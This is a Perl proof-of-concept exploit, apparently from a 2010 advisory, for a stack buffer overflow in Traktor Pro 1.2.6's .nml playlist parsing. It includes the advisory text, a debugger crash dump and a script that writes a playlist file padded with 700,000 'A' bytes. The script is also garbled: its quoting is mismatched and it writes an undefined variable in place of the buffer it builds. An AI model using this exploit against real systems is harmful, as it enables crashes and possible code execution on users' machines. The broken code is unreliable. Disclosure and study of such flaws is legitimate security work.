#!/usr/local/bin/perl # # # Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability # # # Vendor: Native Instruments GmbH # Product web page: http://www.native-instruments.com # Affected version: 1.2.6.8491 (Standalone) # # Summary: TRAKTOR PRO is the new benchmark in DJ software. Mix digital files # on four decks, using the high-quality internal mixer or external hardware, # and the best effects suite around. Fully primed for professional use, TRAKTOR # PRO redefines the art of DJing. # # Desc: Traktor Pro suffers from a stack buffer overflow vulnerability when # parsing playlist files (.nml) resulting in a crash. The user input is not # properly sanitized which may give the attackers the possibility for an # arbitrary code execution on the affected system. Failure of exploitation # may result in a denial of service. # # Tested on: Microsoft Windows XP Professional SP3 (English) # # # ------------------------------------------------------------------- # # (4418.4608): Stack overflow - code c00000fd (first/second chance not available) # eax=14250000 ebx=001cc168 ecx=00000007 edx=7c90e514 esi=001cc140 edi=001cc198 # eip=7c90e514 esp=0ff5e4e4 ebp=0ff5e4f4 iopl=0 nv up ei pl zr na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 # *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - # ntdll!KiFastSystemCallRet: # 7c90e514 c3 ret # # ------------------------------------------------------------------- # # # Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic # liquidworm gmail com # # Zero Science Lab - http://www.zeroscience.mk # # Advisory ID: ZSL-2010-4977 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4977.php # # 09.11.2010 # use strict; print qq{ ------------------------------------------------------------------------- | | | Native Instruments Traktor 1.2.6 Stack Overflow PoC | | | | Copyleft (c) 2010, Zero Science Lab | | | ------------------------------------------------------------------------- }; my $bof = "\x41" x 700000; my $start = ' "; my $end = ' '; my $file = "PoC.nml"; print "\n\n[*] Creating $file playlist file...\n"; open nml, ">./$file" || die "\nCan't open $file: $!"; print nml $start.$traktor.$end; print "\n[.] File successfully buffered!\n\n"; close nml;